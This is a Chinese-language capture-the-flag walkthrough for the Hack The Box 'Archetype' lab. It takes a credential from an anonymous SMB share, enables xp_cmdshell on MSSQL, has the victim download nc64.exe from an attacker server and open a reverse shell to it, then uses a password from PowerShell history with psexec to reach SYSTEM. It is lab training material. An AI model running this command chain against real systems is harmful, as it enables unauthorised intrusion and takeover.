Hack The Box - ArcheType
侦查(Reconnaissance)
在进行渗透测试时,初步侦查能够揭露目标系统的潜在弱点。本次分析中,我们发现目标伺服器开放了 SMB(Server Message Block)服务于 445 或 139 端口,并于 1433 端口运行 Microsoft SQL Server 2017
nmap -sC {TARGET_IP}
扫描结果确认了这些服务的可用性。
扫描(Scanning)
使用 smbclient 列举 SMB 共享资源
smbclient -N -L \\\\\\\\{TARGET_IP}\\\\
参数说明:
- -N:不输入密码。
- -L:列出目标伺服器上的共享资源。
$ 符号的意义
在 SMB 共享列表中,带有 $ 符号的名称表示这些是隐藏共享(Hidden Shares)。这类共享通常不会在一般的共享列表中显示,仅有具备适当权限的使用者才能存取。例如:
- ADMIN$:Windows 预设的管理员共享,对应于 C:\\Windows 目录。
- C$:Windows 预设的磁盘分割区共享(C 槽)。
- IPC$:用于跨进程通讯的共享,允许网路上的应用程式存取特定的 Windows 服务。
在 Linux 中的 UNC 路径处理
在 Linux 环境中,反斜线 \\ 是跳脱字符(escape character),因此要正确表达 Windows 的 UNC 路径,必须使用双反斜线。例如:
- Windows 标準写法:\\\\192.168.1.100\\Shared
- Linux 终端表示:\\\\\\\\192.168.1.100\\\\Shared
这是因为 Linux 会将单一反斜线视为跳脱符,因此必须使用双反斜线来正确解析 UNC 路径。
入侵(Intrusion)
1. 存取 backups 共享资源
smbclient -N \\\\\\\\{TARGET_IP}\\\\backups
成功存取后,下载 prod.dtsConfig 档案:
get prod.dtsConfig
2. 入侵 MSSQL 伺服器
在 prod.dtsConfig 配置文件中,发现 SQL Server 使用者 sql_svc 的明文密码。
载入Impacket 工具包
Impacket 工具包含 mssqlclient.py
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip3 install . --少这行后续SQL指令不会有Output
透过 mssqlclient.py 进行身份验证并存取 SQL Server
python3 mssqlclient.py ARCHETYPE/sql_svc@{TARGET_IP} -windows-auth
成功登入后,即可执行 SQL 查询与系统命令。
启用 xp_cmdshell 以执行系统命令
EXEC sp_configure \'show advanced options\', 1;
RECONFIGURE;
EXEC sp_configure \'xp_cmdshell\', 1;
RECONFIGURE;
EXEC xp_cmdshell \'whoami\';
xp_cmdshell 允许透过 SQL Server 执行 Windows 命令,需谨慎使用,避免潜在的安全风险。
3. 建立 Reverse Shell
传送 nc64.exe 到受害主机
于本机下载 nc64.exe下载 nc64.exe
于攻击机启动 HTTP 伺服器
sudo python3 -m http.server 80
于受害机下载 nc64.exe
xp_cmdshell "powershell -c cd C:\\Users\\sql_svc\\Downloads; wget http://{攻击机IP}/nc64.exe -outfile nc64.exe"
建立反向连线
于攻击机开启监听
sudo nc -nlvp 443
于受害机执行 Reverse Shell
xp_cmdshell "powershell -c cd C:\\Users\\sql_svc\\Downloads; .\\nc64.exe -e cmd.exe {攻击机IP} 443"
提权(Privilege Escalation)
1. WinPEAS扫描
下载 WinPEAS.exe 到受害主机
powershell wget http://{攻击机IP}/winPEASx64.exe -outfile winPEASx64.exe"
开始扫描
.\\winPEASx64.exe
根据扫描结果,在C:\\Users\\sql_svc\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt找到administrator的密码
2. SMB连线
使用 PsExec.py 提权
python3 psexec.py administrator@{TARGET_IP}
成功取得最高权限(SYSTEM)。
取得 user.txt
type C:\\Users\\sql_svc\\Desktop\\user.txt
取得 root.txt
type C:\\Users\\Administrator\\Desktop\\root.txt